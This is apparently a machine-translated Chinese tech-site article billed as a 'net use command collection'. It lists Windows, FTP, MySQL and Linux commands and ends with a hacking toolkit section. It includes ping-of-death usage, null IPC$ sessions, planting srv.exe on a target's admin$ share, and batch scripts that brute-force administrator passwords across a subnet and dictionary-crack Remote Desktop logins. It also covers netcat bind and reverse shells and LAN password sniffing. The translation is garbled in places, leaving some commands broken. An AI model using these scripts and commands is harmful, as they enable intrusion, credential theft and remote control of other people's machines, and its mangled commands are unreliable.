Shulou(Shulou.com)06/03 Report--

This article mainly explains the "net use command collection", the content of the article is simple and clear, easy to learn and understand, now please follow the editor's train of thought slowly in depth, together to study and learn "net use command collection" bar!

Net use\\ ip\ ipc$ "" / user: "" establish an empty IPC link

Net use\\ ip\ ipc$ "password" / user: "user name" to establish an IPC non-empty link

Net use h:\\ ip\ c $"password" / user: "user name" is directly logged in and mapped to the other party C: to the local

H:

Net use h:\\ ip\ c$ after login, map the other party C: to the local H:

Net use\\ ip\ ipc$ / del remove the IPC link

Net use h: / del removes the mapping from the other party to the local H:

Net user username password / add establish user

Net user guest / active:yes activate guest user

Net user to see which users there are.

Net user account name View the properties of the account

Net localgroup administrators username / add adds "user" to the administrator to make it

With administrator privileges, note: add s to the plural after administrator

Net start to see which services are enabled

The net start service name enables the service (e.g. net start telnet, net start schedule)

Net stop service name stop a service

Net time\\ Target ip to check each other's time

Net time\\ Target ip / set sets the local computer time to synchronize with the time of the "target IP" host, plus

The upper parameter / yes can cancel the confirmation information

Net view to see which shares are enabled on the local LAN

Net view\\ ip to see which shares are enabled on the other party's LAN

Net config display system network settings

Net logoff disconnected sharing

Net pause service name pauses a service

Net send ip "text message" sends messages to each other.

Types and information of network connections in use within the net ver LAN

Net share to view locally opened shares

Net share ipc$ enables ipc$ sharing

Net share ipc$ / del delete ipc$ share

Net share c$ / del delete C: share

Net user guest 12345 changes the password to 12345 after logging in with guest.

Net password password change system login password

Netstat-a to check which ports are open, usually netstat-an

Netstat-n to view the network connection of the port, commonly used netstat-an

Netstat-v to view the work in progress

Netstat-p protocol name example: netstat-p tcq/ip to view the usage of a protocol (view tcp/ip

Protocol usage)

Netstat-s to view the usage of all protocols in use

If one of the ports of nbtstat-An ip is open, you can check the recent login of the other party

User name (user name before 03)-Note: parameter-A should be capitalized

Tracert-the parameter ip (or computer name) tracks the route (packet). The parameter "- w number" is used to set

Set the time interval.

Ping ip (or domain name) sends data with a default size of 32 bytes to the other host. The parameter: "- l [space]

Packet size ";"-n times of data sent ";"-t "refers to always ping.

Ping-t-l 65550 ip death ping (sending files greater than 64K and ping all the time becomes death

Ping)

Ipconfig (winipcfg) is used for windows NT and XP (windows 95 98) to view local ip addresses

The ipconfig available parameter "/ all" displays all configuration information

Tlist-t displays the process in a tree line list (an additional tool for the system, which is not installed by default, after the installation

Within the Support/tools folder of the directory)

Forced termination of a process after adding the-F parameter to the kill-F process name (an additional tool for the system. The default is no security.

Installed, in the Support/tools folder of the installation directory)

You can delete a read-only file by adding the-F parameter to the del-F file name. / AR, / AH, / AS, / AA indicate deletion, respectively.

Read-only, hidden, system, archive file, / Amurr, / Amurh, / Amurs, / Amura means to delete except read-only, hide

, system, files other than archives. For example, "DEL/AR *. *" deletes all read-only text in the current directory.

, "DEL/A-S *. *" means to delete all files except system files in the current directory.

Del / S / Q directory or use: rmdir / s / Q directory / S to delete the directory and all subdirectories and

Files. At the same time, use the parameter / Q to cancel the deletion operation and delete it directly when the system confirms it. (two orders are made

Use the same)

Move drive letter\ path\ the file name to be moved the path where the mobile file is stored\ the file name moves the file after moving

The prompt to cancel the confirmation that the same file exists in the mobile directory will be overwritten directly with the parameter / y

Fc one.txt two.txt > 3st.txt compares the two files and outputs the differences to the 3st.txt file

">" and "> >" are redirect commands

At id opens a scheduled task that has been registered

At / delete stops all scheduled tasks. With parameter / yes, it stops without confirmation.

At id / delete to stop a registered scheduled task

At views all scheduled tasks

At\\ ip time program name (or a command) / r runs a program at a certain time and restarts the calculation

Machine

Finger username @ host to see which users have logged in recently

Telnet ip port is far away and login server, default port is 23

Open ip connects to IP (command after telnet login)

Telnet will enter the local telnet by typing telnet directly on the local machine.

Copy path\ filename 1 path\ filename 2 / y copy file 1 to the specified directory as file 2, with parameters

/ y cancel at the same time to confirm that you want to rewrite an existing directory file

Copy c:\ srv.exe\\ ip\ admin$ copy local c:\ srv.exe to the other party's admin

Cppy 1st.jpg/b+2st.txt/a 3st.jpg hides the contents of 2st.txt into 1st.jpg to generate

3st.jpg new file, note: 2st.txt file header should be empty three rows, parameter: / b refers to binary file, / a refers to

ASCLL format file

Copy\\ ip\ admin$\ svv.exe c:\ or: copy\\ ip\ admin$\ *. * copy the other party's admini$ share

Srv.exe files (all files) under to local C:

The destination address of the file or directory tree to be copied by xcopy\ the directory name copies the file and directory tree with the parameter / Y

Will not be prompted to overwrite the same file

Tftp-I own IP (IP when using meat machine as springboard) get server.exe c:\ server.exe

After logging in, download the server.exe of "IP" to the target host c:\ server.exe parameter:-I means two

Transfer in binary mode, such as when transferring exe files, or in ASCII mode if-I is not added (transfer text file mode)

Type) for transmission

After tftp-I IP put c:\ server.exe logs in, upload the local c:\ server.exe to the host

The ftp ip port is used to upload files to the server or perform file operations. The default port is 21. Bin refers to two.

Binary transfer (executable file feed); default to ASCII format transfer (when text files)

Route print shows the IP route, which will mainly show the network address Network addres and subnet mask

Netmask, gateway address Gateway addres, interface address Interface

Arp views and processes the ARP cache. ARP means name resolution and is responsible for parsing an IP into a physical one.

MAC address of the sex. Arp-a will display all the information

Start program name or command / max or / min opens a new window and maximizes (minimizes) running a program

An order or command.

Mem to view cpu usage

Attrib file name (directory name) view the properties of a file (directory)

Attrib file name-A-R-S-H or + A + R + S + H removes (adds) the archive of a file, read-only

, system, hide the attribute; use + to add as an attribute

Dir view files, parameter: / Q shows which user the file and directory belong to the system, / dir C shows when the file is created

The last time the file was accessed and the last time the file was modified is displayed by / TRARIA.

Date / t, time / t use this parameter, that is, "DATE/T", "TIME/T" will only display the current date and

Time without having to enter a new date and time

Set specifies the environment variable name = the character to assign to the variable sets the environment variable

Set displays all current environment variables

Set p (or other characters) displays all environment variables that currently begin with the character p (or other characters)

Pause pauses the batch program and displays: press any key to continue.

If performs conditional processing in a batch program (see if commands and variables for more instructions)

The goto tag directs the cmd.exe to the tagged line in the batch program (the label must be on a separate line with a

Start with a colon, for example: ": start" tag)

The call path\ batch filename calls another batch program from the batch program (see for more instructions

Call /?)

For executes a specific command on each file in a set of files (see for commands and variables for more instructions)

Echo on or off turns echo on or off. Only use echo without parameters to display the current echo settings.

Echo information displays information on the screen

Echo Information > > pass.txt saves the Information to the pass.txt file

Findstr "Hello" aa.txt looks for the string hello in the aa.txt file

Find a file by find filename

Title title name change CMD window title name

Color color values set the cmd console foreground and background colors; 0 = black, 1 = blue, 2 = green, 3 = light green

, 4 = red, 5 = purple, 6 = yellow, 7 = white, 8 = gray, 9 = light blue, A = light green, B = light green, C = light red,

D = lilac, E = yellowish, F = bright white

Prompt name changes the command prompt displayed by cmd.exe (change C:\, D:\ unified to: EntSky\)

Print file name print text file

Ver displays version information under the DOS window

Winver pops up a window showing version information (memory size, system version, patch version, computer name)

)

Format drive letter / FS: type format disk, type: FAT, FAT32, NTFS, for example: Format D:

/ FS:NTFS

Md directory name create directory

Directory replacement file for the replace source file to replace the file

Ren original file name new file name rename file name

Tree displays the directory in a tree structure, and the file names in the folder are listed with the parameter-f

The type file name displays the contents of the text file

More file name displays the output file screen by screen

Command = character to be locked by doskey

Doskey to unlock command = lock command provided for DOS (edit the command line, re-invoke the win2k command

And create macros). For example: lock dir command: doskey dir=entsky (doskey dir=dir cannot be used)

Unlock: doskey dir=

Taskmgr call-up Task Manager

Chkdsk / F D: check disk D and display status report; add parameter / f and fix errors on disk

Tlntadmn telnt service admn, type tlntadmn, select 3, and then select 8, you can change the telnet service

The default port 23 is any other port

Exit exits the cmd.exe program or currently, using parameter / B exits the current batch script instead of cmd.exe

Path path\ the file name of the executable sets a path for the executable.

Cmd launches a win2K command interpretation window. Parameters: / eff, / en turn off, enable command extension; change me

For more information, see cmd /?

Regedit / s registry file name is imported into the registry; parameter / S refers to quiet mode import without any prompt

Regedit / e registry file name export registry

Cacls filename parameter displays or modifies file access control list (ACL)-when for NTFS format

. Parameter: / D user name: set to deny access to a user; / P user name erm replaces the access of the specified user

Permissions; / G username erm gives the specified user access rights; Perm can be: n none, R read

W write, C change (write), F full control; example: cacls D:\ test.txt / D pub setting

D:\ test.txt denies access to pub users.

Cacls filename View the list of access user permissions for the file

REM text content adds annotations to batch files

Netsh view or change local network configuration

IIS service commands:

Iisreset / reboot restart the win2k computer (but there is a prompt that the system restart message will appear)

Iisreset / start or stop start (stop) all Internet services

Iisreset / restart stop and restart all Internet services

Iisreset / status displays the status of all Internet services

Iisreset / enable or disable enables (disables) the restart of the Internet service on the local system

Move

Iisreset / rebootonerror if an error occurs when starting, stopping, or restarting the Internet service

Restart the computer by mistake

Iisreset / noforce if the Internet service cannot be stopped, the Internet service will not be forcibly terminated

Iisreset / timeout Val still does not stop the Internet service when it reaches the timeout (seconds), if specified

/ rebootonerror parameter, the computer will restart. The default is to restart for 20 seconds and stop for 60 seconds.

Reboot for 0 seconds.

FTP command: (more details later)

The command line format for ftp is:

Ftp-v-d-I-n-g [hostname]-v displays all the response information for the remote server.

-d uses debug mode.

-n restrict automatic login of ftp, that is, do not use .netrc files.

-g cancels the global file name.

Help [command] or? [command] View command description

Bye or quit terminates the host FTP process and exits FTP management.

Pwd lists the current remote host directory

Put or send local file name [file name uploaded to the host] transfers a local file to the remote end

In the host

Get or recv [remote host filename] [filename downloaded locally] is transferred from the remote host to

In the local host

Mget [remote-files] receives a batch of files from the remote host to the local host

Mput local-files transfers a batch of files from the local host to the remote host

Dir or ls [remote-directory] [local-file] lists the files in the current remote host directory.

If there is a local file, write the result to the local file

Ascii setting to transfer files in ASCII mode (default)

Bin or image setting to transfer files in binary mode

Every time bell completes a file transfer, an alarm will be given.

Cdup returns to the previous directory

Close interrupts the ftp session with the remote server (corresponding to open)

Open host [port] establish a specified ftp server connection, and you can specify a connection port

Delete deletes files from the remote host

Mdelete [remote-files] deletes a batch of files

Mkdir directory-name sets up a directory in the remote host

Rename [from] [to] change the file name in the remote host

Rmdir directory-name deletes a directory from a remote host

Status displays the status of the current FTP

System displays the remote host system type

User user-name [password] [account] re-log in to the remote host with a different user name

Open host [port] re-establish a new connection

Prompt interactive prompt mode

Macdef define Macro Command

Lcd changes the working directory of the current local host. If default, it changes to the current user's HOME directory.

Chmod changes file permissions of remote hosts

When case is ON, the file names copied with the MGET command are transferred to the local machine and all converted to lowercase letters

Cd remote-dir enters the remote host directory

Cdup enters the parent directory of the remote host directory

! Perform interactive shell,exit in the local machine to return to the ftp environment, such as! ls*.zip

MYSQL command:

Mysql-h host address-u username-p password connection MYSQL; if MYSQL has just been installed, superuser

Root does not have a password.

(example: mysql-h210.110.110.110-Uroot-P123456

Note: U and root can not add spaces, others are the same)

Exit exits MYSQL

Mysqladmin-u username-p old password password new password change password

Grant select on database. * to user name @ login host identified by\ "password\"; add

Add new users. (note: unlike the above, the following is a command in the MYSQL environment.

With a semicolon as the command Terminator)

Show databases; displays a list of databases. At the beginning, there were only two databases: mysql and test.

The mysql library is very important. It contains the system information of MYSQL. When we change our passwords and add new users, it is actually

Operate with this library.

Use mysql

Show tables; displays the data table in the library

Describe table name; displays the structure of the data table

Create database library name; build library.

Use library name

Create table table name (list of field settings); create table

Drop database library name

Drop table table name; delete library and delete table

Delete from table name; empty the records in the table

Select * from table name; displays records in the table

Mysqldump-- opt school > school.bbb backup database: (command in DOS\\ mysql\\ bin

Directory); Note: back up the database school to the school.bbb file, school.bbb is a

Text file, take any file name, open it and you will find something new.

New commands under win2003 system (practical part):

The shutdown / parameter shuts down or restarts the local or remote host.

Parameter description: / S shuts down the host, / R restarts the host, / T digits to set the delay time, with a range of 0,180

Between seconds, / A cancels the boot and / M / / IP specifies the remote host.

Example: shutdown / r / t 0 restarts the local host immediately (without delay)

Taskill / Parameter process name or process pid terminates one or more tasks and processes.

Parameter description: / PID to terminate the pid of the process. You can use the tasklist command to obtain the pid,/IM of each process.

The process name of the terminated process, / F forcibly terminates the process, / T terminates the specified process and the child that it starts

Cheng.

Tasklist displays the process tags of processes, services, and services currently running on local and remote hosts

Identifier (PID).

Parameter description: / M lists the dll files loaded by the current process, and / SVC shows the corresponding services for each process.

When there are no parameters, only the current process is listed.

Basic commands under Linux system: case-sensitive

Uname displays version information (same as ver of win2K)

Dir displays current directory files, ls-al display includes hidden files (same as dir of win2K)

Pwd queries the location of the current directory

Cd cd.. Go back to the previous directory and notice that cd and.. There is a space between them. Cd / return to the root directory.

Cat file name view file contents

Cat > abc.txt writes to the abc.txt file.

The more file name displays a text file on a page-by-page basis.

Cp copy Fil

Mv moves files

Rm file name delete file, rm-a directory name delete directory and subdirectory

Mkdir directory name set up a directory

Rmdir deletes the subdirectory and there are no documents in the directory.

Chmod sets access to files or directories

Grep looks for strings in the archive

Comparison of diff Archives

Find file search

Current date and time of date

Who queries the people who are currently using the same machine as you and the time and place of Login

W query the details of the current passengers.

Whoami check your account name.

Groups check someone's Group

Passwd change password

History checks the commands he has given

Ps displays the status of the process

Kill stops a process

Gcc hackers usually use it to compile files written in C language.

Su permissions are converted to the specified user

Telnet IP telnet connects to the other host (same as win2K). When bash$ appears, the connection is successful.

Ftp ftp connects to a server (same as win2K)

Attached: batch commands and variables

Basic format of 1:for commands and variables:

FOR / parameter% variable IN (set) DO command [command_parameters]% variable:

Specify a single letter replaceable parameter, such as:% I, while specifying a variable uses:% I, and calls the

Variables are:% I%, variables are case-sensitive (% I is not equal to% I).

A total of 10 variables can be processed in a batch from% 0mi% 9, of which% 0 is used by default for the batch file name,% 1

The default is the first value entered when using this batch, similarly:% 2muri% 9 refers to the 2nd-9th value entered; for example

: in net use\\ ip\ ipc$ pass / user:user, ip is% 1, user is% 2, user is% 3.

(set): specify a file or group of files, using wildcards, such as (D:\ user.txt) and (11 254) (1

-1 254), {"(1 254)" the first "1" refers to the starting value, the second "1" refers to the growth, and the third "254"

Refers to the end value, that is, from 1 to 254; "(1-1 254)" description: from 254 to 1}

Command: specifies the command to be executed on the first file, such as the net use command; if multiple commands are to be executed

Order this room to be separated by: &

Command_parameters: specify parameters or command line switches for specific commands

IN (set): means to take a value in (set); DO command: means to execute command

Parameter: / L refers to the incremental form {(set) as the incremental form}; / F refers to taking values from the file until the

When finished {(set) is a file, such as (d:\ pass.txt)}.

Examples of usage:

@ echo off

Echo usage format: test.bat *. *. * > test.txt

For / L% G in (11 254) do echo% 1% G > > test.txt & net use\ 1% 1% G

/ user:administrator | find "Command completed successfully" > > test.txt

Save as test.bat description: try to build an administrator for 254 IP of a specified Class C network segment.

An IPC$ connection with an empty password, and if successful, store the IP in test.txt.

/ L refers to the incremental form (that is, from 1-254or254-1); the first three digits of the input IP: *. *. * default for batch processing

% 1% G is a variable (the last bit of ip) & used to separate the commands echo and net use

| | after the ipc$ is established, use find to check whether there is a "command completed successfully" message in the result;% 1%% G is

The complete IP address; (11 254) refers to the start value, growth value, and end value.

@ echo off

Echo usage format: ok.bat ip

FOR / F% I IN (D:\ user.dic) DO smb.exe% 1% I D:\ pass.dic 200

Save as: ok.exe description: after entering an IP, use the dictionary file d:\ pass.dic to expose d:\ user.dic

The user password in the until the value in the file has been fetched. I is the user name; 1 is the entered IP address (default

).

Basic format of 2:if commands and variables:

IF [not] errorlevel numeric command statement if the program runs and finally returns an equal to or greater than the

The exit code of a fixed number, specifying that the condition is "true".

Example: the IF errorlevel 0 command refers to the command after the value line when the value returned by the program is 0.

The IF not errorlevel 1 command means that if the last value returned by the program is not equal to 1, the following command will be executed.

.

0 refers to discovery and successful execution (true); 1 refers to no discovery, no execution (false).

IF [not] string 1 string = string 2 command statement if the specified text string matches (that is, string

1 equals string 2), execute the following command.

Example: "if"% 2 "=" 4 "goto start" means: if the second variable entered is 4, execute the following

Command (note: when calling a variable, add the% variable name% and add "")

IF [not] exist filename command statement executes the following command if the specified filename exists.

Example: "if not nc.exe goto end" means: if you don't find a nc.exe file, skip to the ": end" mark.

Signature.

IF [not] errorlevel numeric command statement else command statement or IF [not] string "="

String 2 command statement else command statement or IF [not] exist file name command statement else command

Statement plus: else command statement means: when the previous condition is not true, it refers to the life after the line else

Ling. Note: else must be on the same line as if to be valid. When there is a del command, you need to use all the del commands.

Content use

< >

To sum up, because the del command can only be executed on a separate line, use the

< >

Then it is tantamount to being alone.

One line; for example: "if exist test.txt. Else echo"

Test.txt.missing ", pay attention to the". "in the command.

(2) external commands of the system (all relevant tools need to be downloaded):

1. Swiss Army knife: nc.exe

Parameter description:

-h View help information

-d background mode

-e prog program redirect, execute as soon as it is connected [dangerous]

-I interval of secs delay

-l snooping mode for inbound connections

-L monitoring mode, which will continue to monitor after the connection is closed until CTR+C

-n IP address, domain name cannot be used

-o film records hexadecimal transmission

-p [blank] port local port number

-r Random local and remote ports

-t use Telnet interaction

-u UDP mode

-v detailed output, more detailed with-vv

-w digital timeout delay interval

-z turn off input and output (when sweeping anchor)

Basic usage:

Nc-nvv 192.168.0.1 80 connects to port 80 of the 192.168.0.1 host

Nc-l-p 80 open TCP port 80 of this machine and listen

Nc-nvv-w2-z 192.168.0.1 80-1024 sweep anchor port 80-1024 of 192.168.0.1

Nc-l-p 5354-t-e c:winntsystem32cmd.exe binds the cmdshell of the remote host at

TCP 5354 port of remote

Nc-t-e c:winntsystem32cmd.exe 192.168.0.2 5354 Bangding remote host

Cmdshell and reverse connect port 5354 of 192.168.0.2

Advanced usage:

Nc-L-p 80 is used as a honeypot 1: open and constantly monitor port 80 until CTR+C

Nc-L-p 80 > c:\ log.txt as honeypot 2: open and constantly monitor port 80 until

CTR+C, while outputting the result to c:\ log.txt

Nc-L-p 80

< c:\honeyport.txt 作为蜜罐用3-1：开启并不停地监听80端口， 直到CTR+C,并把c:\honeyport.txt中内容送入管道中，亦可起到传送文件作用 type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2：开启并不停地监听80端 口，直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用 本机上用：nc -l -p 本机端口 在对方主机上用：nc -e cmd.exe 本机IP -p 本机端口 *win2K nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火 墙 本机上用：nc -d -l -p 本机端口 < 要传送的文件路径及名称 在对方主机上用：nc -vv 本机IP 本机端口 >

The path and name of the file to be stored to transfer the file

Go to the other host

Remarks:

| | Pipeline command |

< 或 >

Redirect command. "" Means: overwrite; "> >" means: save to (add to).

For example, @ dir c:\ winnt > > d:\ log.txt and @ dir c:\ winnt > d:\ log.txt respectively

If you perform a secondary comparison, you will save all the results of the second time with > >, but only once with: >.

Because the result of the second time covers the first one.

2. Anchor sweeping tool: xscan.exe

Basic format

Xscan-host [-] [other options] sweep anchor "start IP to end"

All host information for the "IP" section

Xscan-file [other options] sweep anchor "host IP list file"

All host information in name

Test item

-active to check whether the host is alive

-os detects remote operating system types (through NETBIOS and SNMP protocols)

-port detects the port status of common services

-ftp detects FTP weak password

-pub detects anonymous user write permissions for FTP services

-pop3 detects POP3-Server weak password

-smtp detects SMTP-Server vulnerabilities

-sql detects SQL-Server weak password

-smb detects NT-Server weak password

-iis detects IIS encoding / decoding vulnerabilities

-cgi detects CGI vulnerabilities

-nasl loads Nessus attack script

-all detects all the above items

Other options

-I adapter number sets the network adapter, which can be obtained through the "- l" parameter

-l displays all network adapters

-v shows detailed scan progress

-p skips hosts that are not responding

-o Skip hosts that do not detect open ports

-t the number of concurrent threads, the number of concurrent hosts specifies the maximum number of concurrent threads and the number of concurrent hosts, default

The quantity is 100 and 10.

-log file name specifies the scan report file name (suffix: TXT or HTML format file)

Usage example

Xscan-host 192.168.1.1-192.168.255.255-all-active-p detection

All vulnerabilities of hosts in the 192.168.1.1-192.168.255.255 network segment, skipping unresponsive hosts

Xscan-host 192.168.1.1-192.168.255.255-port-smb-t 150-o detection

Standard port status of hosts in the 192.168.1.1-192.168.255.255 network segment, NT weak password user, maximum

150 concurrent threads, skipping hosts that do not detect open ports

Xscan-file hostlist.txt-port-cgi-t 200pm 5-v-o test "hostlist.txt"

The standard port status of all hosts listed in the file, CGI vulnerabilities, and the maximum number of concurrent threads is 200. same as

Detect up to 5 hosts at a time, show detailed detection progress, and skip hosts that do not detect open ports

3. Command line sniffer: xsniff.exe

Can capture FTP/SMTP/POP3/HTTP protocol password in local area network

Parameter description

-tcp output TCP Datagram

-udp output UDP Datagram

-icmp output ICMP Datagram

-pass filter password information

-hide runs in the background

-host resolves hostname

-addr IP address filtering IP address

-port port filter port

-log file name saves the output to a file

-asc output in ASCII format

-hex output in hexadecimal format

Usage example

Xsniff.exe-pass-hide-log pass.log background runs to sniff the password and save the password information in the

In the pass.log file

Xsniff.exe-tcp-udp-asc-addr 192.168.1.1 sniffing 192.168.1.1 and filtering tcp and

Udp information and output in ASCII format

4. Terminal Services password cracking: tscrack.exe

Parameter description

-h display usage help

-v displays version information

-s type the decryption ability on the screen

-b the sound made when the password is wrong

-t sends out multiple connections (multithreaded)

-N Prevent System Log entries on targeted server

-U Uninstall remove tscrack components

-f use the password after-f

-F interval (frequency)

-l uses the user name after-l

-w uses the password dictionary after-w

-p use the password after-p

-D log in to the main page

Usage example

Tscrack 192.168.0.1-l administrator-w pass.dic remote password dictionary file burst

Login password of the host's administrator

Tscrack 192.168.0.1-l administrator-p 123456 remote login with password 123456

Administrator users of 192.168.0.1

@ if not exist ipcscan.txt goto noscan

@ for / f "tokens=1 delims=" I in (3389.txt) do call hack.bat% I

Nscan

@ echo 3389.txt no find or scan faild

(① saved as 3389.bat) (assuming that the existing SuperScan or other anchor sweeper sweeps to a batch of owners with 3389

Machine IP list file 3389.txt)

3389.bat means: take an IP from the 3389.txt file and run hack.bat

@ if not exist tscrack.exe goto noscan

@ tscrack 1-l administrator-w pass.dic > > rouji.txt

: noscan

@ echo tscrack.exe no find or scan faild

(② is saved as hack.bat) (running 3389.bat is OK, and 3389.bat, hack.bat, 3389.txt,

Pass.dic and tscrack.exe are in the same directory; you can wait for the result)

Hack.bat means: run tscrack.exe to break all hosts in 3389.txt with a dictionary

Administrator password, and save the cracking results in the rouji.txt file.

5. Other:

Shutdown.exe

Shutdown\\ IP address tNT shuts down automatically after 20 seconds (the Windows 2003 system comes with a tool

In Windows2000, you have to download this tool to use it. In the previous Windows 2003 DOS command

There is a detailed introduction. )

Fpipe.exe (TCP Port Redirection tool) is described in detail in the second article (Port Redirection Bypass Fire Protection

Wall)

Fpipe-l 80-s 1029-r 80 [url] www.sina.com.cn [/ url] when someone sweeps your port 80, he sweeps

The result will be the host information of [url] www.sina.com.cn [/ url].

Fpipe-l 23-s 88-r 23 destination IP sends port 23 Telnet requests sent locally to the destination IP via the end

After the port is redirected, it is sent through port 88 to port 23 of the destination IP. (the time of establishing Telnet with target IP

The 88 port used by the computer is connected to it) and then: direct Telnet 127.0.0.1 (native IP) is connected to

Port 23 of the target IP.

OpenTelnet.exe (open the telnet tool remotely)

Opentelnet.exe\\ IP account password ntlm authentication Telnet port (no upload required

Ntlm.exe destroys Microsoft's authentication method) after the other party's telnet service is opened remotely, it is available

Telnet\\ ip connects to each other.

NTLM authentication method: 0: do not use NTLM authentication; 1: try NTLM authentication first, if failed

And then use the user name and password; 2: use NTLM authentication only.

ResumeTelnet.exe (another tool shipped with OpenTelnet)

After the resumetelnet.exe\\ IP account password has connected to the other party with Telnet, use this command to set the

Restore the other party's Telnet settings and shut down the Telnet service at the same time.

6. Detailed explanation of FTP command:

FTP command is one of the commands most frequently used by Internet users. We are familiar with and flexibly apply the internal commands of FTP.

It can greatly facilitate the user and get twice the result with half the effort. If you want to learn to use it under the background FTP

Then you must learn the FTP instruction.

The command line format for FTP is:

Ftp-v-d-I-n-g [hostname], where

-v displays all response information of the remote server

-n restrict the automatic login of ftp, that is, do not use; .n etrc file

-d use debug mode

-g cancel global file name

Thank you for your reading, the above is the content of "net use Command Collection", after the study of this article, I believe you have a deeper understanding of the problem of net use command collection, and the specific use needs to be verified in practice. Here is, the editor will push for you more related knowledge points of the article, welcome to follow!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.